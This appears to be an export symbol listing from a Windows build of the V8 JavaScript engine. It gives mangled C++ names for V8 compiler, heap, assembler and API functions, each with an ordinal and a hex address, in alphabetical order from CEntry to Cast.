                                                                                                                                                                                                        ?CEntry@CodeFactory@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@23@PEAVIsolate@23@HW4SaveFPRegsMode@23@W4ArgvMode@23@_N@Z37290x140ab2290
                                                                                                                                                                                                        ?CEntryStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@HW4SaveFPRegsMode@34@W4ArgvMode@34@_N@Z37300x140f55960
                                                                                                                                                                                                        ?CEntryStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@H@Z37310x140f59380
                                                                                                                                                                                                        ?CSPViolation@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB37320x141ff9a40
                                                                                                                                                                                                        ?CachedDataVersionTag@ScriptCompiler@v8@@SAIXZ37330x140b08d10
                                                                                                                                                                                                        ?CalculateAllocationLimit@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@SA_KPEAVHeap@23@_K111NW4HeapGrowingMode@423@@Z37340x1409c6720
                                                                                                                                                                                                        ?CalculateAllocationLimit@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@SA_KPEAVHeap@23@_K111NW4HeapGrowingMode@423@@Z37350x1409c68b0
                                                                                                                                                                                                        ?CalculateFixedFrameSize@CallDescriptor@compiler@internal@v8@@QEBAHW4CodeKind@34@@Z37360x140eaaa60
                                                                                                                                                                                                        ?CalculateValue@Utf8@unibrow@@SAIPEBE_KPEA_K@Z37370x1406bc890
                                                                                                                                                                                                        ?Call@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z37380x140ab2440
                                                                                                                                                                                                        ?Call@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBVCallDescriptor@234@@Z37390x140eb24e0
                                                                                                                                                                                                        ?Call@Execution@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1HQEAV623@@Z37400x140a25ea0
                                                                                                                                                                                                        ?Call@Function@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@HQEAV52@@Z37410x140b08da0
                                                                                                                                                                                                        ?Call@GraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@PEBVCallDescriptor@234@HPEAPEAVNode@234@@Z37420x140f593e0
                                                                                                                                                                                                        ?Call@GraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@PEBVOperator@234@HPEAPEAVNode@234@@Z37430x140f59450
                                                                                                                                                                                                        ?Call@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KAEBVCallFrequency@234@AEBUFeedbackSource@234@W4ConvertReceiverMode@34@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z37440x140f3a520
                                                                                                                                                                                                        ?Call@TurboAssembler@internal@v8@@QEAAXPEAVLabel@23@@Z37450x14049b850
                                                                                                                                                                                                        ?Call@TurboAssembler@internal@v8@@QEAAXV?$Handle@VCode@internal@v8@@@23@W4Mode@RelocInfo@23@@Z37460x140501150
                                                                                                                                                                                                        ?Call@TurboAssembler@internal@v8@@QEAAXVExternalReference@23@@Z37470x1405011d0
                                                                                                                                                                                                        ?Call@TurboAssembler@internal@v8@@QEAAXVOperand@23@@Z37480x140501200
                                                                                                                                                                                                        ?Call@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z37490x14049b860
                                                                                                                                                                                                        ?Call@TurboAssembler@internal@v8@@QEAAX_KW4Mode@RelocInfo@23@@Z37500x140501260
                                                                                                                                                                                                        ?CallAnyReceiver@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z37510x14091a8e0
                                                                                                                                                                                                        ?CallApiCallback@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z37520x140ab2480
                                                                                                                                                                                                        ?CallAsConstructor@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@HQEAV?$Local@VValue@v8@@@2@@Z37530x140b09120
                                                                                                                                                                                                        ?CallAsFunction@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@HQEAV52@@Z37540x140b09430
                                                                                                                                                                                                        ?CallBuiltin@TurboAssembler@internal@v8@@QEAAXW4Builtin@23@@Z37550x1405012b0
                                                                                                                                                                                                        ?CallBuiltinByIndex@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z37560x140501320
                                                                                                                                                                                                        ?CallCFunction@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@V?$Optional@VMachineType@internal@v8@@@base@4@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z37570x140f1ee60
                                                                                                                                                                                                        ?CallCFunction@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@V?$Optional@VMachineType@internal@v8@@@base@4@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z37580x14108c2d0
                                                                                                                                                                                                        ?CallCFunction@TurboAssembler@internal@v8@@QEAAXVExternalReference@23@H@Z37590x140501400
                                                                                                                                                                                                        ?CallCFunction@TurboAssembler@internal@v8@@QEAAXVRegister@23@H@Z37600x140501440
                                                                                                                                                                                                        ?CallCFunctionN@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV?$Signature@VMachineType@internal@v8@@@34@HPEBQEAV5234@@Z37610x140f1eea0
                                                                                                                                                                                                        ?CallCFunctionWithCallerSavedRegisters@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@W4SaveFPRegsMode@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z37620x140f1eef0
                                                                                                                                                                                                        ?CallCFunctionWithCallerSavedRegisters@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@W4SaveFPRegsMode@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z37630x14108c580
                                                                                                                                                                                                        ?CallCFunctionWithoutFunctionDescriptor@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z37640x140f1ef20
                                                                                                                                                                                                        ?CallCFunctionWithoutFunctionDescriptor@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z37650x14108c5e0
                                                                                                                                                                                                        ?CallCheckStackGuardState@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ37660x1404aa830
                                                                                                                                                                                                        ?CallCodeDataContainerObject@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z37670x1405016f0
                                                                                                                                                                                                        ?CallCodeObject@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z37680x140501700
                                                                                                                                                                                                        ?CallCodeTObject@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z37690x140501700
                                                                                                                                                                                                        ?CallDebugOnFunctionCall@MacroAssembler@internal@v8@@QEAAXVRegister@23@000@Z37700x140501730
                                                                                                                                                                                                        ?CallDescriptorOf@compiler@internal@v8@@YAPEBVCallDescriptor@123@QEBVOperator@123@@Z37710x140078d70
                                                                                                                                                                                                        ?CallEnqueueMicrotask@MicrotaskQueue@internal@v8@@SA_KPEAVIsolate@23@_J_K@Z37720x140a02db0
                                                                                                                                                                                                        ?CallEphemeronKeyBarrier@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4SaveFPRegsMode@23@@Z37730x140501970
                                                                                                                                                                                                        ?CallEpilogue@CodeAssembler@compiler@internal@v8@@AEAAXXZ37740x140f1ef50
                                                                                                                                                                                                        ?CallForDeoptimization@TurboAssembler@internal@v8@@QEAAXW4Builtin@23@HPEAVLabel@23@W4DeoptimizeKind@23@11@Z37750x140501af0
                                                                                                                                                                                                        ?CallForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z37760x140ab24a0
                                                                                                                                                                                                        ?CallForwardVarargs@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KI@Z37770x140f3a630
                                                                                                                                                                                                        ?CallFunction@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z37780x140ab24c0
                                                                                                                                                                                                        ?CallFunctionForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z37790x140ab2500
                                                                                                                                                                                                        ?CallJSRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@HVRegisterList@234@@Z37800x14091a9a0
                                                                                                                                                                                                        ?CallJSStubImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@AEBVCallInterfaceDescriptor@34@V?$TNode@VObject@internal@v8@@@34@11V?$Optional@V?$TNode@VObject@internal@v8@@@internal@v8@@@base@4@V?$TNode@UInt32T@internal@v8@@@34@V?$initializer_list@PEAVNode@compiler@internal@v8@@@std@@@Z37810x140f1ef70
                                                                                                                                                                                                        ?CallN@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAVCallDescriptor@234@HPEBQEAV5234@@Z37820x14108c640
                                                                                                                                                                                                        ?CallNWithFrameState@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAVCallDescriptor@234@HPEBQEAV5234@@Z37830x14108c640
                                                                                                                                                                                                        ?CallOnceImpl@base@v8@@YAXPEAU?$atomic@E@std@@V?$function@$$A6AXXZ@4@@Z37840x140e632e0
                                                                                                                                                                                                        ?CallPrologue@CodeAssembler@compiler@internal@v8@@AEAAXXZ37850x140f1f100
                                                                                                                                                                                                        ?CallProperty@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z37860x14091a9c0
                                                                                                                                                                                                        ?CallRecordWriteStub@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@W4StubCallMode@23@@Z37870x140501bc0
                                                                                                                                                                                                        ?CallRecordWriteStubSaveRegisters@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@W4StubCallMode@23@@Z37880x140501da0
                                                                                                                                                                                                        ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@@Z37890x14091ab00
                                                                                                                                                                                                        ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegister@234@@Z37900x14091ab20
                                                                                                                                                                                                        ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegisterList@234@@Z37910x14091ab40
                                                                                                                                                                                                        ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBUFunction@Runtime@34@_K@Z37920x140f3a700
                                                                                                                                                                                                        ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4FunctionId@Runtime@34@@Z37930x140f3a7e0
                                                                                                                                                                                                        ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4FunctionId@Runtime@34@_K@Z37940x140f3a810
                                                                                                                                                                                                        ?CallRuntime@MacroAssembler@internal@v8@@QEAAXPEBUFunction@Runtime@23@HW4SaveFPRegsMode@23@@Z37950x140501ec0
                                                                                                                                                                                                        ?CallRuntime@MacroAssembler@internal@v8@@QEAAXW4FunctionId@Runtime@23@HW4SaveFPRegsMode@23@@Z37960x14049b870
                                                                                                                                                                                                        ?CallRuntime@MacroAssembler@internal@v8@@QEAAXW4FunctionId@Runtime@23@W4SaveFPRegsMode@23@@Z37970x14049b8b0
                                                                                                                                                                                                        ?CallRuntimeForPair@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegister@234@VRegisterList@234@@Z37980x14091abc0
                                                                                                                                                                                                        ?CallRuntimeForPair@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegisterList@234@1@Z37990x14091ac00
                                                                                                                                                                                                        ?CallRuntimeImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4FunctionId@Runtime@34@V?$TNode@VObject@internal@v8@@@34@V?$initializer_list@V?$TNode@VObject@internal@v8@@@internal@v8@@@std@@@Z38000x140f1f120
                                                                                                                                                                                                        ?CallRuntimeParametersOf@compiler@internal@v8@@YAAEBVCallRuntimeParameters@123@PEBVOperator@123@@Z38010x14032ab80
                                                                                                                                                                                                        ?CallStubN@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4StubCallMode@34@AEBVCallInterfaceDescriptor@34@HPEBQEAV5234@@Z38020x140f1f340
                                                                                                                                                                                                        ?CallStubRImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4StubCallMode@34@AEBVCallInterfaceDescriptor@34@V?$TNode@VObject@internal@v8@@@34@2V?$initializer_list@PEAVNode@compiler@internal@v8@@@std@@@Z38030x140f1f400
                                                                                                                                                                                                        ?CallUndefinedReceiver@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z38040x14091ac30
                                                                                                                                                                                                        ?CallVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38050x140ab2520
                                                                                                                                                                                                        ?CallWasm@Execution@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VCode@internal@v8@@@23@_KV?$Handle@VObject@internal@v8@@@23@2@Z38060x140a26080
                                                                                                                                                                                                        ?CallWasm@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBUWasmModule@wasm@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@AEBUFeedbackSource@234@@Z38070x140f3a840
                                                                                                                                                                                                        ?CallWithArrayLike@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38080x140ab2540
                                                                                                                                                                                                        ?CallWithArrayLike@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVCallFrequency@234@AEBUFeedbackSource@234@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z38090x140f3a930
                                                                                                                                                                                                        ?CallWithSpread@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z38100x14091ae80
                                                                                                                                                                                                        ?CallWithSpread@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38110x140ab2560
                                                                                                                                                                                                        ?CallWithSpread@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z38120x140f3aa30
                                                                                                                                                                                                        ?Call_WithFeedback@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z38130x140ab2580
                                                                                                                                                                                                        ?Callable@Type@compiler@internal@v8@@SA?AV1234@XZ38140x1404bb4f0
                                                                                                                                                                                                        ?CallableFor@Builtins@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4Builtin@23@@Z38150x140ab7580
                                                                                                                                                                                                        ?CallableProxy@Type@compiler@internal@v8@@SA?AV1234@XZ38160x1404bb500
                                                                                                                                                                                                        ?CallbackEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z38170x140078990
                                                                                                                                                                                                        ?CallbackEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z38180x14074a320
                                                                                                                                                                                                        ?CalleeSaveRegisters@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ38190x1404bb510
                                                                                                                                                                                                        ?CalleeSavedFPRegisters@CallDescriptor@compiler@internal@v8@@QEBAIXZ38200x1403430c0
                                                                                                                                                                                                        ?CalleeSavedRegisters@CallDescriptor@compiler@internal@v8@@QEBAIXZ38210x140335900
                                                                                                                                                                                                        ?CanAddressRelativeToRootsRegister@InstructionSelector@compiler@internal@v8@@QEBA_NAEBVExternalReference@34@@Z38220x140ed43e0
                                                                                                                                                                                                        ?CanAllocateInReadOnlySpace@Factory@internal@v8@@AEAA_NXZ38230x1409cf3a0
                                                                                                                                                                                                        ?CanAllocateInReadOnlySpace@LocalFactory@internal@v8@@AEAA_NXZ38240x14007a0b0
                                                                                                                                                                                                        ?CanAllocateSharedPages@PageAllocator@base@v8@@UEAA_NXZ38250x14007a0b0
                                                                                                                                                                                                        ?CanBeActivated@IncrementalMarking@internal@v8@@QEAA_NXZ38260x1409a6f10
                                                                                                                                                                                                        ?CanBeAsserted@Type@compiler@internal@v8@@QEBA_NXZ38270x1404bb520
                                                                                                                                                                                                        ?CanBeDeprecated@MapRef@compiler@internal@v8@@QEBA_NXZ38280x140e84ab0
                                                                                                                                                                                                        ?CanBeInvokedWith@AsmFunctionType@wasm@internal@v8@@UEAA_NPEAVAsmType@234@AEBV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@@Z38290x140632500
                                                                                                                                                                                                        ?CanBeInvokedWith@AsmOverloadedFunctionType@wasm@internal@v8@@EEAA_NPEAVAsmType@234@AEBV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@@Z38300x140632720
                                                                                                                                                                                                        ?CanBeNullOrUndefined@NodeProperties@compiler@internal@v8@@SA_NPEAVJSHeapBroker@234@PEAVNode@234@VEffect@234@@Z38310x140eac2c0
                                                                                                                                                                                                        ?CanBePrimitive@NodeProperties@compiler@internal@v8@@SA_NPEAVJSHeapBroker@234@PEAVNode@234@VEffect@234@@Z38320x140eac4e0
                                                                                                                                                                                                        ?CanBeRehashed@StartupData@v8@@QEBA_NXZ38330x140b09750
                                                                                                                                                                                                        ?CanBeSpilled@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z38340x140f82270
                                                                                                                                                                                                        ?CanBreakAtEntry@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z38350x140a5dab0
                                                                                                                                                                                                        ?CanContinue@TryCatch@v8@@QEBA_NXZ38360x140b09760
                                                                                                                                                                                                        ?CanCover@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@0@Z38370x140ed4410
                                                                                                                                                                                                        ?CanCover@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z38380x140f822d0
                                                                                                                                                                                                        ?CanCoverTransitively@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@00@Z38390x140ed4520
                                                                                                                                                                                                        ?CanDiscardMemory@Sweeper@internal@cppgc@@SA_NXZ38400x140078bb0
                                                                                                                                                                                                        ?CanExpandOldGeneration@Heap@internal@v8@@AEAA_N_K@Z38410x1409b03a0
                                                                                                                                                                                                        ?CanExpandOldGenerationBackground@Heap@internal@v8@@AEAA_NPEAVLocalHeap@23@_K@Z38420x1409b0430
                                                                                                                                                                                                        ?CanHaveMoreTransitions@TransitionsAccessor@internal@v8@@QEAA_NXZ38430x1407bbfa0
                                                                                                                                                                                                        ?CanMakeExternal@String@v8@@QEAA_NXZ38440x140b09770
                                                                                                                                                                                                        ?CanPeel@LoopPeeler@compiler@internal@v8@@QEAA_NPEAVLoop@LoopTree@234@@Z38450x140f0f680
                                                                                                                                                                                                        ?CanProduceSignalingNaN@InstructionSelector@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z38460x140ed45c0
                                                                                                                                                                                                        ?CanPromoteYoungAndExpandOldGeneration@Heap@internal@v8@@AEAA_N_K@Z38470x1409b0500
                                                                                                                                                                                                        ?CanReadUnaligned@RegExpBytecodeGenerator@internal@v8@@UEAA_NXZ38480x14007a0b0
                                                                                                                                                                                                        ?CanRegisterUnwindInfoForNonABICompliantCodeRange@WasmCodeManager@wasm@internal@v8@@SA_NXZ38490x140569210
                                                                                                                                                                                                        ?CanTailCall@CallDescriptor@compiler@internal@v8@@QEBA_NPEBV1234@@Z38500x140eaaae0
                                                                                                                                                                                                        ?CanTransition@MapRef@compiler@internal@v8@@QEBA_NXZ38510x140e84bb0
                                                                                                                                                                                                        ?CanTreatHoleAsUndefined@JSNativeContextSpecialization@compiler@internal@v8@@AEAA_NAEBV?$ZoneVector@VMapRef@compiler@internal@v8@@@34@@Z38520x14101b340
                                                                                                                                                                                                        ?CanUseRootsRegister@InstructionSelector@compiler@internal@v8@@QEBA_NXZ38530x140ed45e0
                                                                                                                                                                                                        ?Cancel@Cancelable@internal@v8@@AEAA_NXZ38540x1404829d0
                                                                                                                                                                                                        ?Cancel@ConcurrentMarkerBase@internal@cppgc@@QEAAXXZ38550x140467e50
                                                                                                                                                                                                        ?CancelAndWait@CancelableTaskManager@internal@v8@@QEAAXXZ38560x1406b8170
                                                                                                                                                                                                        ?CancelAndWait@OperationsBarrier@internal@v8@@QEAAXXZ38570x1406b7d00
                                                                                                                                                                                                        ?CancelCompilation@CompilationState@wasm@internal@v8@@QEAAXXZ38580x140595b70
                                                                                                                                                                                                        ?CancelIfShouldNotCompact@Compactor@internal@cppgc@@QEAA_NW4MarkingType@Heap@3@W4EmbedderStackState@3@@Z38590x140468f60
                                                                                                                                                                                                        ?CancelInitialCompilation@CompilationState@wasm@internal@v8@@QEAAXXZ38600x140595bb0
                                                                                                                                                                                                        ?CancelScheduledExceptionFromTryCatch@Isolate@internal@v8@@QEAAXPEAVTryCatch@3@@Z38610x140a0c660
                                                                                                                                                                                                        ?CancelTerminateExecution@Isolate@internal@v8@@QEAAXXZ38620x140a0c6b0
                                                                                                                                                                                                        ?CancelTerminateExecution@Isolate@v8@@QEAAXXZ38630x140b097d0
                                                                                                                                                                                                        ?Canonicalize@CharacterSet@internal@v8@@QEAAXXZ38640x140733e10
                                                                                                                                                                                                        ?CanonicalizeShuffle@InstructionSelector@compiler@internal@v8@@AEAAXPEAVNode@234@PEAEPEA_N@Z38650x140ed45f0
                                                                                                                                                                                                        ?CanonicalizeShuffle@SimdShuffle@wasm@internal@v8@@SAX_NPEAEPEA_N2@Z38660x140573240
                                                                                                                                                                                                        ?Capacity@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAHXZ38670x1404829e0
                                                                                                                                                                                                        ?Capacity@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAHXZ38680x1404829e0
                                                                                                                                                                                                        ?Capacity@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAAHXZ38690x1404829f0
                                                                                                                                                                                                        ?Capacity@HashTableBase@internal@v8@@QEBAHXZ38700x140475550
                                                                                                                                                                                                        ?Capacity@NewSpace@internal@v8@@QEAA_KXZ38710x140482a00
                                                                                                                                                                                                        ?Capacity@OrderedNameDictionaryHandler@internal@v8@@SAHVHeapObject@23@@Z38720x1407e3490
                                                                                                                                                                                                        ?Capacity@PagedSpace@internal@v8@@QEAA_KXZ38730x140482a30
                                                                                                                                                                                                        ?Capacity@StringTable@internal@v8@@QEBAHXZ38740x1407ca6a0
                                                                                                                                                                                                        ?Capacity@SwissNameDictionary@internal@v8@@QEAAHXZ38750x140476210
                                                                                                                                                                                                        ?Capacity@TransitionsAccessor@internal@v8@@IEAAHXZ38760x140482a40
                                                                                                                                                                                                        ?CapacityFor@SwissNameDictionary@internal@v8@@SAHH@Z38770x140482a60
                                                                                                                                                                                                        ?CapacityForLength@OSROptimizedCodeCache@internal@v8@@CAHH@Z38780x1407df850
                                                                                                                                                                                                        ?CapacityOffset@SwissNameDictionary@internal@v8@@SAHXZ38790x140476220
                                                                                                                                                                                                        ?CaptureAndSetDetailedStackTrace@Isolate@internal@v8@@QEAA?AV?$MaybeHandle@VJSReceiver@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z38800x140a0c710
                                                                                                                                                                                                        ?CaptureAndSetSimpleStackTrace@Isolate@internal@v8@@QEAA?AV?$MaybeHandle@VJSReceiver@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@W4FrameSkipMode@23@V?$Handle@VObject@internal@v8@@@23@@Z38810x140a0c820
                                                                                                                                                                                                        ?CaptureCurrentStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@HW4StackTraceOptions@StackTrace@3@@Z38820x140a0cf70
                                                                                                                                                                                                        ?CaptureSimpleStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@W4FrameSkipMode@23@V423@@Z38830x140a0d000
                                                                                                                                                                                                        ?Cast@AccessorPair@debug@v8@@SAPEAV123@PEAVValue@3@@Z38840x140078ac0
                                                                                                                                                                                                        ?Cast@AccessorSignature@v8@@SAPEAV12@PEAVData@2@@Z38850x140078ac0
                                                                                                                                                                                                        ?Cast@Array@v8@@SAPEAV12@PEAVValue@2@@Z38860x140078ac0
                                                                                                                                                                                                        ?Cast@ArrayBuffer@v8@@SAPEAV12@PEAVValue@2@@Z38870x140078ac0
                                                                                                                                                                                                        ?Cast@ArrayBufferView@v8@@SAPEAV12@PEAVValue@2@@Z38880x140078ac0
                                                                                                                                                                                                        ?Cast@BigInt64Array@v8@@SAPEAV12@PEAVValue@2@@Z38890x140078ac0
                                                                                                                                                                                                        ?Cast@BigInt@v8@@SAPEAV12@PEAVData@2@@Z38900x140078ac0
                                                                                                                                                                                                        ?Cast@BigIntObject@v8@@SAPEAV12@PEAVValue@2@@Z38910x140078ac0
                                                                                                                                                                                                        ?Cast@BigUint64Array@v8@@SAPEAV12@PEAVValue@2@@Z38920x140078ac0
                                                                                                                                                                                                        ?Cast@Boolean@v8@@SAPEAV12@PEAVData@2@@Z38930x140078ac0
                                                                                                                                                                                                        ?Cast@BooleanObject@v8@@SAPEAV12@PEAVValue@2@@Z38940x140078ac0
                                                                                                                                                                                                        ?Cast@CodeAssembler@compiler@internal@v8@@QEAA?AV?$CheckedNode@VObject@internal@v8@@$0A@@1234@PEAVNode@234@PEBD@Z38950x14007a380
                                                                                                                                                                                                        ?Cast@Context@v8@@SAPEAV12@PEAVData@2@@Z38960x140078ac0
                                                                                                                                                                                                        ?Cast@DataView@v8@@SAPEAV12@PEAVValue@2@@Z38970x140078ac0
                                                                                                                                                                                                        ?Cast@Date@v8@@SAPEAV12@PEAVValue@2@@Z38980x140078ac0
                                                                                                                                                                                                        ?Cast@External@v8@@SAPEAV12@PEAVValue@2@@Z38990x140078ac0
                                                                                                                                                                                                        ?Cast@Float32Array@v8@@SAPEAV12@PEAVValue@2@@Z39000x140078ac0
                                                                                                                                                                                                        ?Cast@Float64Array@v8@@SAPEAV12@PEAVValue@2@@Z39010x140078ac0
                                                                                                                                                                                                        ?Cast@Function@v8@@SAPEAV12@PEAVValue@2@@Z39020x140078ac0
                                                                                                                                                                                                        ?Cast@FunctionTemplate@v8@@SAPEAV12@PEAVData@2@@Z39030x140078ac0
                                                                                                                                                                                                        ?Cast@Int16Array@v8@@SAPEAV12@PEAVValue@2@@Z39040x140078ac0
                                                                                                                                                                                                        ?Cast@Int32@v8@@SAPEAV12@PEAVData@2@@Z39050x140078ac0
                                                                                                                                                                                                        ?Cast@Int32Array@v8@@SAPEAV12@PEAVValue@2@@Z39060x140078ac0
                                                                                                                                                                                                        ?Cast@Int8Array@v8@@SAPEAV12@PEAVValue@2@@Z39070x140078ac0
                                                                                                                                                                                                        ?Cast@Integer@v8@@SAPEAV12@PEAVData@2@@Z39080x140078ac0
                                                                                                                                                                                                        ?Cast@Map@v8@@SAPEAV12@PEAVValue@2@@Z39090x140078ac0
                                                                                                                                                                                                        ?Cast@Module@v8@@SAPEAV12@PEAVData@2@@Z39100x140078ac0
                                                                                                                                                                                                        ?Cast@ModuleRequest@v8@@SAPEAV12@PEAVData@2@@Z39110x140078ac0
                                                                                                                                                                                                        ?Cast@Name@v8@@SAPEAV12@PEAVData@2@@Z39120x140078ac0
                                                                                                                                                                                                        ?Cast@Number@v8@@SAPEAV12@PEAVData@2@@Z39130x140078ac0
                                                                                                                                                                                                        ?Cast@NumberObject@v8@@SAPEAV12@PEAVValue@2@@Z39140x140078ac0
                                                                                                                                                                                                        ?Cast@Object@v8@@SAPEAV12@PEAVValue@2@@Z39150x140078ac0
                                                                                                                                                                                                        ?Cast@ObjectTemplate@v8@@SAPEAV12@PEAVData@2@@Z39160x140078ac0
                                                                                                                                                                                                        ?Cast@Private@v8@@SAPEAV12@PEAVData@2@@Z39170x140078ac0
                                                                                                                                                                                                        ?Cast@Promise@v8@@SAPEAV12@PEAVValue@2@@Z39180x140078ac0
                                                                                                                                                                                                        ?Cast@Proxy@v8@@SAPEAV12@PEAVValue@2@@Z39190x140078ac0
                                                                                                                                                                                                        ?Cast@RegExp@v8@@SAPEAV12@PEAVValue@2@@Z39200x140078ac0
                                                                                                                                                                                                        ?Cast@Resolver@Promise@v8@@SAPEAV123@PEAVValue@3@@Z39210x140078ac0
                                                                                                                                                                                                        ?Cast@Set@v8@@SAPEAV12@PEAVValue@2@@Z39220x140078ac0
